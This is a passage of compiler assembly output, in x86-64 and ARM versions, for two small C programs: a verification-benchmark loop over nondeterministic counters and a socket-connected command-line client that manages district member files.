.file "433612.c" .intel_syntax noprefix .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 32 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov eax, 16 sub rax, 1 add rax, 12 mov edi, 16 mov edx, 0 div rdi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L2: cmp rsp, rdx je .L3 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L2 .L3: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L4 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L4: mov rax, rsp add rax, 15 shr rax, 4 sal rax, 4 mov QWORD PTR -24[rbp], rax mov eax, 16 sub rax, 1 add rax, 12 mov esi, 16 mov edx, 0 div rsi imul rax, rax, 16 mov rcx, rax and rcx, -4096 mov rdx, rsp sub rdx, rcx .L5: cmp rsp, rdx je .L6 sub rsp, 4096 or QWORD PTR 4088[rsp], 0 jmp .L5 .L6: mov rdx, rax and edx, 4095 sub rsp, rdx mov rdx, rax and edx, 4095 test rdx, rdx je .L7 and eax, 4095 sub rax, 8 add rax, rsp or QWORD PTR [rax], 0 .L7: mov rax, rsp add rax, 15 shr rax, 4 sal rax, 4 mov QWORD PTR -16[rbp], rax jmp .L8 .L13: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] test eax, eax jle .L9 call __VERIFIER_nondet_int@PLT test eax, eax je .L10 mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] lea edx, -1[rax] mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], edx call __VERIFIER_nondet_int@PLT mov rdx, QWORD PTR -16[rbp] mov DWORD PTR [rdx], eax jmp .L8 .L10: mov rax, QWORD PTR -16[rbp] mov eax, DWORD PTR [rax] lea edx, -1[rax] mov rax, QWORD PTR -16[rbp] mov DWORD PTR [rax], edx jmp .L8 .L9: call __VERIFIER_nondet_int@PLT test eax, eax je .L11 mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] lea edx, 1[rax] mov rax, QWORD PTR -24[rbp] mov DWORD PTR [rax], edx jmp .L8 .L11: mov rax, QWORD PTR -16[rbp] mov eax, DWORD PTR [rax] lea edx, -1[rax] mov rax, QWORD PTR -16[rbp] mov DWORD PTR [rax], edx call __VERIFIER_nondet_int@PLT mov rdx, QWORD PTR -24[rbp] mov DWORD PTR [rdx], eax .L8: mov rax, QWORD PTR -24[rbp] mov eax, DWORD PTR [rax] test eax, eax je .L12 mov rax, QWORD PTR -16[rbp] mov eax, DWORD PTR [rax] test eax, eax jg .L13 .L12: mov eax, 0 mov rsi, QWORD PTR -8[rbp] sub rsi, QWORD PTR fs:40 je .L15 call __stack_chk_fail@PLT .L15: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "433612.c" .text .section .rodata .align 2 .LC0: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 16 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #16 ldr r3, .L10 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 sub sp, sp, #8 mov r3, sp add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 str r3, [fp, #-16] sub sp, sp, #8 mov r3, sp add r3, r3, #7 lsr r3, r3, #3 lsl r3, r3, #3 str r3, [fp, #-12] b .L2 .L7: ldr r3, [fp, #-16] ldr r3, [r3] cmp r3, #0 ble .L3 bl __VERIFIER_nondet_int mov r3, r0 cmp r3, #0 beq .L4 ldr r3, [fp, #-16] ldr r3, [r3] sub r2, r3, #1 ldr r3, [fp, #-16] str r2, [r3] bl __VERIFIER_nondet_int mov r2, r0 ldr r3, [fp, #-12] str r2, [r3] b .L2 .L4: ldr r3, [fp, #-12] ldr r3, [r3] sub r2, r3, #1 ldr r3, [fp, #-12] str r2, [r3] b .L2 .L3: bl __VERIFIER_nondet_int mov r3, r0 cmp r3, #0 beq .L5 ldr r3, [fp, #-16] ldr r3, [r3] add r2, r3, #1 ldr r3, [fp, #-16] str r2, [r3] b .L2 .L5: ldr r3, [fp, #-12] ldr r3, [r3] sub r2, r3, #1 ldr r3, [fp, #-12] str r2, [r3] bl __VERIFIER_nondet_int mov r2, r0 ldr r3, [fp, #-16] str r2, [r3] .L2: ldr r3, [fp, #-16] ldr r3, [r3] cmp r3, #0 beq .L6 ldr r3, [fp, #-12] ldr r3, [r3] cmp r3, #0 bgt .L7 .L6: mov r3, #0 ldr r2, .L10 ldr r1, [r2] ldr r2, [fp, #-8] eors r1, r2, r1 mov r2, #0 beq .L9 bl __stack_chk_fail .L9: mov r0, r3 sub sp, fp, #4 @ sp needed pop {fp, pc} .L11: .align 2 .L10: .word .LC0 .size main, .-main .ident "GCC: (Ubuntu 9.4.0-1ubuntu1~20.04.2) 9.4.0" .section .note.GNU-stack,"",%progbits
.file "304713.c" .intel_syntax noprefix .text .section .rodata .LC0: .string "connection error" .LC1: .string "error receiving from server" .LC2: .string "Enter Agent name: " .LC3: .string "%s" .LC4: .string "Enter District name: " .LC5: .string "Welcome, %s.\n" .align 8 .LC6: .string "-------------------------------------------------------------------------------------------" .align 8 .LC7: .string "Welcome to the UFT Command pallete." .align 8 .LC8: .string "The commands available to you are Addmember, Check_status, get_statement, Search and help." .align 8 .LC9: .string "The date is entered in the format yyyy-mm-dd." .LC10: .string "Enter command action" .LC11: .string "\n UFT>: " .LC12: .string "%s %s %s %d-%d-%d %s %s" .LC13: .string "Addmember" .LC14: .string "get_statement" .LC15: .string "Search" .LC16: .string "Check_status" .LC17: .string "help" .LC18: .string "quit" .LC19: .string "Signature" .LC20: .string "r" .LC21: .string "a" .LC22: .string "The file has been added." .LC23: .string "%s " .LC24: .string "%04d-%02d-%02d " .LC25: .string "\n member added" .LC26: .string "payment.txt" .LC27: .string "Found" .LC28: .string "Not found" .align 8 .LC29: .string "Error! File for district doesn't exist." .LC30: .string "The file is empty." .align 8 .LC31: .string " Addmember,Check_status,get_statement,help,quit" .LC32: .string "Enter 0 or 1:" .LC33: .string " %d" .LC34: .string "\nNumber enter not 0 or 1." .LC35: .string "%c " .text .globl main .type main, @function main: .LFB6: .cfi_startproc endbr64 push rbp .cfi_def_cfa_offset 16 .cfi_offset 6, -16 mov rbp, rsp .cfi_def_cfa_register 6 sub rsp, 2176 mov rax, QWORD PTR fs:40 mov QWORD PTR -8[rbp], rax xor eax, eax mov edx, 0 mov esi, 1 mov edi, 2 call socket@PLT mov DWORD PTR -2140[rbp], eax mov WORD PTR -2080[rbp], 2 mov edi, 9002 call htons@PLT mov WORD PTR -2078[rbp], ax mov DWORD PTR -2076[rbp], 0 lea rcx, -2080[rbp] mov eax, DWORD PTR -2140[rbp] mov edx, 16 mov rsi, rcx mov edi, eax call connect@PLT mov DWORD PTR -2136[rbp], eax cmp DWORD PTR -2136[rbp], -1 jne .L2 lea rdi, .LC0[rip] call perror@PLT mov edi, 1 call exit@PLT .L2: mov DWORD PTR -2132[rbp], 1 mov DWORD PTR -2128[rbp], 0 lea rsi, -1520[rbp] mov eax, DWORD PTR -2140[rbp] mov ecx, 0 mov edx, 256 mov edi, eax call recv@PLT test rax, rax jns .L3 lea rdi, .LC1[rip] call perror@PLT mov edi, 1 call exit@PLT .L3: mov QWORD PTR -2120[rbp], 0 mov QWORD PTR -2112[rbp], 0 mov DWORD PTR -2164[rbp], 0 mov DWORD PTR -2160[rbp], 0 mov DWORD PTR -2156[rbp], 0 mov DWORD PTR -1860[rbp], 1954051118 mov BYTE PTR -1856[rbp], 0 mov DWORD PTR -2124[rbp], 0 mov DWORD PTR -2152[rbp], 0 lea rdi, .LC2[rip] mov eax, 0 call printf@PLT lea rax, -1840[rbp] mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call __isoc99_scanf@PLT lea rdi, .LC4[rip] mov eax, 0 call printf@PLT lea rax, -1808[rbp] mov rsi, rax lea rdi, .LC3[rip] mov eax, 0 call __isoc99_scanf@PLT lea rax, -1808[rbp] mov rdi, rax call strlen@PLT mov rdx, rax lea rax, -1808[rbp] add rax, rdx mov DWORD PTR [rax], 1954051118 mov BYTE PTR 4[rax], 0 lea rax, -1808[rbp] mov QWORD PTR -2120[rbp], rax lea rax, -1840[rbp] mov rsi, rax lea rdi, .LC5[rip] mov eax, 0 call printf@PLT lea rdi, .LC6[rip] call puts@PLT lea rdi, .LC7[rip] call puts@PLT lea rdi, .LC8[rip] call puts@PLT lea rdi, .LC9[rip] call puts@PLT lea rdi, .LC6[rip] call puts@PLT lea rdi, .LC10[rip] call puts@PLT jmp .L4 .L42: lea rdi, .LC11[rip] mov eax, 0 call printf@PLT mov rdx, QWORD PTR stdin[rip] lea rax, -1264[rbp] mov esi, 256 mov rdi, rax call fgets@PLT lea rax, -2000[rbp] lea r8, 100[rax] lea rax, -2000[rbp] lea rdi, 60[rax] lea rax, -2000[rbp] lea rcx, 30[rax] lea rdx, -2000[rbp] lea rax, -1264[rbp] lea rsi, -2000[rbp] add rsi, 106 push rsi lea rsi, -2000[rbp] add rsi, 104 push rsi lea rsi, -2000[rbp] add rsi, 92 push rsi lea rsi, -2000[rbp] add rsi, 96 push rsi mov r9, r8 mov r8, rdi lea rsi, .LC12[rip] mov rdi, rax mov eax, 0 call __isoc99_sscanf@PLT add rsp, 32 lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC13[rip] call strcmp@PLT test eax, eax jne .L5 mov DWORD PTR -2152[rbp], 1 jmp .L6 .L5: lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC14[rip] call strcmp@PLT test eax, eax jne .L7 mov DWORD PTR -2152[rbp], 2 jmp .L6 .L7: lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC15[rip] call strcmp@PLT test eax, eax jne .L8 mov DWORD PTR -2152[rbp], 3 jmp .L6 .L8: lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC16[rip] call strcmp@PLT test eax, eax jne .L9 mov DWORD PTR -2152[rbp], 4 jmp .L6 .L9: lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC17[rip] call strcmp@PLT test eax, eax jne .L10 mov DWORD PTR -2152[rbp], 5 jmp .L6 .L10: lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC18[rip] call strcmp@PLT test eax, eax jne .L11 mov DWORD PTR -2152[rbp], 6 jmp .L6 .L11: lea rax, -2000[rbp] mov rsi, rax lea rdi, .LC19[rip] call strcmp@PLT test eax, eax jne .L12 mov DWORD PTR -2152[rbp], 7 jmp .L6 .L12: mov DWORD PTR -2152[rbp], 0 .L6: lea rax, -2000[rbp] mov edx, 30 mov esi, 0 mov rdi, rax call memset@PLT cmp DWORD PTR -2152[rbp], 7 ja .L45 mov eax, DWORD PTR -2152[rbp] lea rdx, 0[0+rax*4] lea rax, .L15[rip] mov eax, DWORD PTR [rdx+rax] cdqe lea rdx, .L15[rip] add rax, rdx notrack jmp rax .section .rodata .align 4 .align 4 .L15: .long .L45-.L15 .long .L21-.L15 .long .L20-.L15 .long .L19-.L15 .long .L18-.L15 .long .L17-.L15 .long .L45-.L15 .long .L14-.L15 .text .L21: lea rax, -1860[rbp] lea rdx, -2000[rbp] add rdx, 30 mov rsi, rax mov rdi, rdx call strstr@PLT mov QWORD PTR -2096[rbp], rax cmp QWORD PTR -2096[rbp], 0 je .L22 lea rax, -2000[rbp] add rax, 30 lea rsi, .LC20[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -2088[rbp], rax mov rdx, QWORD PTR -2088[rbp] lea rax, -1008[rbp] mov esi, 1000 mov rdi, rax call fgets@PLT lea rax, -1008[rbp] mov rdi, rax call puts@PLT mov rax, QWORD PTR -2088[rbp] mov rdi, rax call fclose@PLT mov rax, QWORD PTR -2120[rbp] lea rsi, .LC21[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -2104[rbp], rax mov rdx, QWORD PTR -2104[rbp] lea rax, -1008[rbp] mov rsi, rdx mov rdi, rax call fputs@PLT mov rax, QWORD PTR -2104[rbp] mov rdi, rax call fclose@PLT lea rdi, .LC22[rip] mov eax, 0 call printf@PLT jmp .L24 .L22: mov rax, QWORD PTR -2120[rbp] lea rsi, .LC21[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -2104[rbp], rax lea rax, -2000[rbp] lea rdx, 30[rax] mov rax, QWORD PTR -2104[rbp] lea rsi, .LC23[rip] mov rdi, rax mov eax, 0 call fprintf@PLT lea rax, -2000[rbp] lea rdx, 60[rax] mov rax, QWORD PTR -2104[rbp] lea rsi, .LC23[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov esi, DWORD PTR -1908[rbp] mov ecx, DWORD PTR -1904[rbp] mov edx, DWORD PTR -1900[rbp] mov rax, QWORD PTR -2104[rbp] mov r8d, esi lea rsi, .LC24[rip] mov rdi, rax mov eax, 0 call fprintf@PLT lea rax, -2000[rbp] lea rdx, 104[rax] mov rax, QWORD PTR -2104[rbp] lea rsi, .LC23[rip] mov rdi, rax mov eax, 0 call fprintf@PLT lea rax, -2000[rbp] lea rdx, 106[rax] mov rax, QWORD PTR -2104[rbp] lea rsi, .LC23[rip] mov rdi, rax mov eax, 0 call fprintf@PLT mov rax, QWORD PTR -2104[rbp] mov rsi, rax mov edi, 10 call fputc@PLT mov rax, QWORD PTR -2104[rbp] mov rdi, rax call fclose@PLT lea rdi, .LC25[rip] mov eax, 0 call printf@PLT jmp .L24 .L20: lea rsi, .LC20[rip] lea rdi, .LC26[rip] call fopen@PLT mov QWORD PTR -2104[rbp], rax mov rdx, QWORD PTR -2104[rbp] lea rax, -1776[rbp] mov esi, 255 mov rdi, rax call fgets@PLT mov rax, QWORD PTR -2104[rbp] mov rdi, rax call fclose@PLT jmp .L24 .L19: mov rax, QWORD PTR -2120[rbp] lea rsi, .LC20[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -2104[rbp], rax jmp .L25 .L27: lea rax, -2000[rbp] lea rdx, 30[rax] lea rax, -1008[rbp] mov rsi, rdx mov rdi, rax call strcmp@PLT test eax, eax jne .L26 lea rdi, .LC27[rip] call puts@PLT jmp .L25 .L26: lea rdi, .LC28[rip] call puts@PLT .L25: lea rdx, -1008[rbp] mov rax, QWORD PTR -2104[rbp] lea rsi, .LC3[rip] mov rdi, rax mov eax, 0 call __isoc99_fscanf@PLT cmp eax, -1 jne .L27 mov rax, QWORD PTR -2104[rbp] mov rdi, rax call fclose@PLT jmp .L24 .L18: mov rax, QWORD PTR -2120[rbp] lea rsi, .LC20[rip] mov rdi, rax call fopen@PLT mov QWORD PTR -2104[rbp], rax cmp QWORD PTR -2104[rbp], 0 jne .L28 lea rdi, .LC29[rip] call puts@PLT mov edi, 1 call exit@PLT .L28: mov rdx, QWORD PTR -2104[rbp] lea rax, -1776[rbp] mov esi, 255 mov rdi, rax call fgets@PLT test rax, rax je .L29 lea rax, -1776[rbp] mov rdi, rax call puts@PLT jmp .L30 .L29: lea rdi, .LC30[rip] call puts@PLT .L30: mov rax, QWORD PTR -2104[rbp] mov rdi, rax call fclose@PLT jmp .L24 .L17: lea rdi, .LC31[rip] mov eax, 0 call printf@PLT jmp .L24 .L14: mov DWORD PTR -2148[rbp], 0 jmp .L31 .L32: mov eax, DWORD PTR -2148[rbp] add eax, 1 mov esi, eax lea rdi, .LC32[rip] mov eax, 0 call printf@PLT lea rdx, -2064[rbp] mov eax, DWORD PTR -2148[rbp] cdqe sal rax, 2 add rax, rdx mov rsi, rax lea rdi, .LC33[rip] mov eax, 0 call __isoc99_scanf@PLT add DWORD PTR -2148[rbp], 1 .L31: cmp DWORD PTR -2148[rbp], 14 jle .L32 mov DWORD PTR -2144[rbp], 0 jmp .L33 .L37: mov eax, DWORD PTR -2144[rbp] cdqe mov eax, DWORD PTR -2064[rbp+rax*4] test eax, eax jne .L34 mov eax, DWORD PTR -2144[rbp] cdqe mov BYTE PTR -1855[rbp+rax], 32 jmp .L35 .L34: mov eax, DWORD PTR -2144[rbp] cdqe mov eax, DWORD PTR -2064[rbp+rax*4] cmp eax, 1 jne .L36 mov eax, DWORD PTR -2144[rbp] cdqe mov BYTE PTR -1855[rbp+rax], 42 jmp .L35 .L36: lea rdi, .LC34[rip] mov eax, 0 call printf@PLT call getchar@PLT .L35: add DWORD PTR -2144[rbp], 1 .L33: cmp DWORD PTR -2144[rbp], 14 jle .L37 mov DWORD PTR -2164[rbp], 0 mov edi, 10 call putchar@PLT mov edi, 10 call putchar@PLT mov DWORD PTR -2160[rbp], 0 jmp .L38 .L41: mov DWORD PTR -2156[rbp], 0 jmp .L39 .L40: mov eax, DWORD PTR -2164[rbp] cdqe movzx eax, BYTE PTR -1855[rbp+rax] movsx eax, al mov esi, eax lea rdi, .LC35[rip] mov eax, 0 call printf@PLT add DWORD PTR -2156[rbp], 1 add DWORD PTR -2164[rbp], 1 .L39: cmp DWORD PTR -2156[rbp], 2 jle .L40 mov edi, 10 call putchar@PLT add DWORD PTR -2160[rbp], 1 .L38: cmp DWORD PTR -2160[rbp], 4 jle .L41 jmp .L24 .L45: nop .L24: lea rax, -2000[rbp] mov rsi, rax mov eax, 0 mov edx, 17 mov rdi, rsi mov rcx, rdx rep stosq .L4: cmp DWORD PTR -2152[rbp], 6 jne .L42 mov eax, DWORD PTR -2140[rbp] mov edi, eax mov eax, 0 call close@PLT mov eax, 0 mov rcx, QWORD PTR -8[rbp] sub rcx, QWORD PTR fs:40 je .L44 call __stack_chk_fail@PLT .L44: leave .cfi_def_cfa 7, 8 ret .cfi_endproc .LFE6: .size main, .-main .ident "GCC: (Ubuntu 10.5.0-1ubuntu1~20.04) 10.5.0" .section .note.GNU-stack,"",@progbits .section .note.gnu.property,"a" .align 8 .long 1f - 0f .long 4f - 1f .long 5 0: .string "GNU" 1: .align 8 .long 0xc0000002 .long 3f - 2f 2: .long 0x3 3: .align 8 4:
.arch armv5t .eabi_attribute 20, 1 .eabi_attribute 21, 1 .eabi_attribute 23, 3 .eabi_attribute 24, 1 .eabi_attribute 25, 1 .eabi_attribute 26, 2 .eabi_attribute 30, 6 .eabi_attribute 34, 0 .eabi_attribute 18, 4 .file "304713.c" .text .section .rodata .align 2 .LC0: .ascii "connection error\000" .align 2 .LC1: .ascii "error receiving from server\000" .align 2 .LC3: .ascii "Enter Agent name: \000" .align 2 .LC4: .ascii "%s\000" .align 2 .LC5: .ascii "Enter District name: \000" .align 2 .LC2: .ascii ".txt\000" .align 2 .LC6: .ascii "Welcome, %s.\012\000" .align 2 .LC7: .ascii "---------------------------------------------------" .ascii "----------------------------------------\000" .align 2 .LC8: .ascii "Welcome to the UFT Command pallete.\000" .align 2 .LC9: .ascii "The commands available to you are Addmember, Check_" .ascii "status, get_statement, Search and help.\000" .align 2 .LC10: .ascii "The date is entered in the format yyyy-mm-dd.\000" .align 2 .LC11: .ascii "Enter command action\000" .align 2 .LC12: .ascii "\012 UFT>: \000" .align 2 .LC13: .ascii "%s %s %s %d-%d-%d %s %s\000" .align 2 .LC14: .ascii "Addmember\000" .align 2 .LC15: .ascii "get_statement\000" .align 2 .LC16: .ascii "Search\000" .align 2 .LC17: .ascii "Check_status\000" .align 2 .LC18: .ascii "help\000" .align 2 .LC19: .ascii "quit\000" .align 2 .LC20: .ascii "Signature\000" .align 2 .LC21: .ascii "r\000" .align 2 .LC22: .ascii "a\000" .align 2 .LC23: .ascii "The file has been added.\000" .align 2 .LC24: .ascii "%s \000" .align 2 .LC25: .ascii "%04d-%02d-%02d \000" .align 2 .LC26: .ascii "\012 member added\000" .align 2 .LC27: .ascii "payment.txt\000" .align 2 .LC28: .ascii "Found\000" .align 2 .LC29: .ascii "Not found\000" .align 2 .LC30: .ascii "Error! File for district doesn't exist.\000" .align 2 .LC31: .ascii "The file is empty.\000" .align 2 .LC32: .ascii " Addmember,Check_status,get_statement,help,quit\000" .align 2 .LC33: .ascii "Enter 0 or 1:\000" .align 2 .LC34: .ascii " %d\000" .align 2 .LC35: .ascii "\012Number enter not 0 or 1.\000" .align 2 .LC36: .ascii "%c \000" .align 2 .LC37: .word __stack_chk_guard .text .align 2 .global main .syntax unified .arm .fpu softvfp .type main, %function main: @ args = 0, pretend = 0, frame = 2136 @ frame_needed = 1, uses_anonymous_args = 0 push {fp, lr} add fp, sp, #4 sub sp, sp, #2160 ldr r3, .L46 ldr r3, [r3] str r3, [fp, #-8] mov r3,#0 mov r2, #0 mov r1, #1 mov r0, #2 bl socket str r0, [fp, #-2116] sub r3, fp, #4 sub r3, r3, #2064 sub r3, r3, #8 mov r2, #2 strh r2, [r3] @ movhi ldr r0, .L46+4 bl htons mov r3, r0 mov r2, r3 sub r3, fp, #4 sub r3, r3, #2064 sub r3, r3, #8 strh r2, [r3, #2] @ movhi mov r3, #0 str r3, [fp, #-2072] sub r3, fp, #2064 sub r3, r3, #4 sub r3, r3, #8 mov r2, #16 mov r1, r3 ldr r0, [fp, #-2116] bl connect str r0, [fp, #-2112] ldr r3, [fp, #-2112] cmn r3, #1 bne .L2 ldr r0, .L46+8 bl perror mov r0, #1 bl exit .L2: mov r3, #1 str r3, [fp, #-2108] mov r3, #0 str r3, [fp, #-2104] sub r1, fp, #1504 sub r1, r1, #4 sub r1, r1, #12 mov r3, #0 mov r2, #256 ldr r0, [fp, #-2116] bl recv mov r3, r0 cmp r3, #0 bge .L3 ldr r0, .L46+12 bl perror mov r0, #1 bl exit .L3: mov r3, #0 str r3, [fp, #-2100] mov r3, #0 str r3, [fp, #-2096] mov r3, #0 str r3, [fp, #-2140] mov r3, #0 str r3, [fp, #-2136] mov r3, #0 str r3, [fp, #-2132] ldr r2, .L46+16 sub r3, fp, #1856 sub r3, r3, #4 sub r3, r3, #4 ldm r2, {r0, r1} str r0, [r3] add r3, r3, #4 strb r1, [r3] mov r3, #0 str r3, [fp, #-2092] mov r3, #0 str r3, [fp, #-2128] ldr r0, .L46+20 bl printf sub r3, fp, #1824 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+24 bl __isoc99_scanf ldr r0, .L46+28 bl printf sub r3, fp, #1792 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+24 bl __isoc99_scanf sub r3, fp, #1792 sub r3, r3, #4 sub r3, r3, #12 mov r0, r3 bl strlen mov r3, r0 mov r2, r3 sub r3, fp, #1792 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, r2 ldr r2, .L46+16 mov r0, r3 mov r1, r2 mov r3, #5 mov r2, r3 bl memcpy sub r3, fp, #1792 sub r3, r3, #4 sub r3, r3, #12 str r3, [fp, #-2100] sub r3, fp, #1824 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+32 bl printf ldr r0, .L46+36 bl puts ldr r0, .L46+40 bl puts ldr r0, .L46+44 bl puts ldr r0, .L46+48 bl puts ldr r0, .L46+36 bl puts ldr r0, .L46+52 bl puts b .L4 .L42: ldr r0, .L46+56 bl printf ldr r3, .L46+60 ldr r2, [r3] sub r3, fp, #1248 sub r3, r3, #4 sub r3, r3, #12 mov r1, #256 mov r0, r3 bl fgets sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r1, r3, #30 sub r2, fp, #1984 sub r2, r2, #4 sub r2, r2, #12 sub r0, fp, #1248 sub r0, r0, #4 sub r0, r0, #12 sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #106 str r3, [sp, #20] sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #104 str r3, [sp, #16] sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #92 str r3, [sp, #12] sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #96 str r3, [sp, #8] sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #100 str r3, [sp, #4] sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #60 str r3, [sp] mov r3, r1 ldr r1, .L46+64 bl __isoc99_sscanf sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+68 bl strcmp mov r3, r0 cmp r3, #0 bne .L5 mov r3, #1 str r3, [fp, #-2128] b .L6 .L5: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+72 bl strcmp mov r3, r0 cmp r3, #0 bne .L7 mov r3, #2 str r3, [fp, #-2128] b .L6 .L7: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+76 bl strcmp mov r3, r0 cmp r3, #0 bne .L8 mov r3, #3 str r3, [fp, #-2128] b .L6 .L8: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+80 bl strcmp mov r3, r0 cmp r3, #0 bne .L9 mov r3, #4 str r3, [fp, #-2128] b .L6 .L9: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+84 bl strcmp mov r3, r0 cmp r3, #0 bne .L10 mov r3, #5 str r3, [fp, #-2128] b .L6 .L10: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+88 bl strcmp mov r3, r0 cmp r3, #0 bne .L11 mov r3, #6 str r3, [fp, #-2128] b .L6 .L11: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r1, r3 ldr r0, .L46+92 bl strcmp mov r3, r0 cmp r3, #0 bne .L12 mov r3, #7 str r3, [fp, #-2128] b .L6 .L12: mov r3, #0 str r3, [fp, #-2128] .L6: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 mov r2, #30 mov r1, #0 mov r0, r3 bl memset ldr r3, [fp, #-2128] sub r3, r3, #1 cmp r3, #6 ldrls pc, [pc, r3, asl #2] b .L45 .L15: .word .L21 .word .L20 .word .L19 .word .L18 .word .L17 .word .L45 .word .L14 .L21: sub r2, fp, #1856 sub r2, r2, #4 sub r2, r2, #4 sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #30 mov r1, r2 mov r0, r3 bl strstr str r0, [fp, #-2084] ldr r3, [fp, #-2084] cmp r3, #0 beq .L22 sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #30 ldr r1, .L46+96 mov r0, r3 bl fopen str r0, [fp, #-2080] sub r3, fp, #1008 ldr r2, [fp, #-2080] mov r1, #1000 mov r0, r3 bl fgets sub r3, fp, #1008 mov r0, r3 bl puts ldr r0, [fp, #-2080] bl fclose ldr r1, .L46+100 ldr r0, [fp, #-2100] bl fopen str r0, [fp, #-2088] sub r3, fp, #1008 ldr r1, [fp, #-2088] mov r0, r3 bl fputs ldr r0, [fp, #-2088] bl fclose ldr r0, .L46+104 bl printf b .L24 .L22: ldr r1, .L46+100 ldr r0, [fp, #-2100] bl fopen str r0, [fp, #-2088] sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #30 mov r2, r3 ldr r1, .L46+108 ldr r0, [fp, #-2088] bl fprintf sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #60 mov r2, r3 ldr r1, .L46+108 ldr r0, [fp, #-2088] bl fprintf ldr r2, [fp, #-1900] ldr r1, [fp, #-1904] ldr r3, [fp, #-1908] str r3, [sp] mov r3, r1 ldr r1, .L46+112 ldr r0, [fp, #-2088] bl fprintf sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #104 mov r2, r3 ldr r1, .L46+108 ldr r0, [fp, #-2088] bl fprintf sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r3, r3, #106 mov r2, r3 ldr r1, .L46+108 ldr r0, [fp, #-2088] bl fprintf ldr r1, [fp, #-2088] mov r0, #10 bl fputc ldr r0, [fp, #-2088] bl fclose ldr r0, .L46+116 bl printf b .L24 .L20: ldr r1, .L46+96 ldr r0, .L46+120 bl fopen str r0, [fp, #-2088] sub r3, fp, #1760 sub r3, r3, #4 sub r3, r3, #12 ldr r2, [fp, #-2088] mov r1, #255 mov r0, r3 bl fgets ldr r0, [fp, #-2088] bl fclose b .L24 .L19: ldr r1, .L46+96 ldr r0, [fp, #-2100] bl fopen str r0, [fp, #-2088] b .L25 .L27: sub r3, fp, #1984 sub r3, r3, #4 sub r3, r3, #12 add r2, r3, #30 sub r3, fp, #1008 mov r1, r2 mov r0, r3 bl strcmp mov r3, r0 cmp r3, #0 bne .L26 ldr r0, .L46+124 bl puts b .L25 .L26: ldr r0, .L46+128 bl puts .L25: sub r3, fp, #1008 mov r2, r3 ldr r1, .L46+24 ldr r0, [fp, #-2088] bl __isoc99_fscanf mov r3, r0 cmn r3, #1 bne .L27 ldr r0, [fp, #-2088] bl fclose b .L24 .L18: ldr r1, .L46+96 ldr r0, [fp, #-2100] 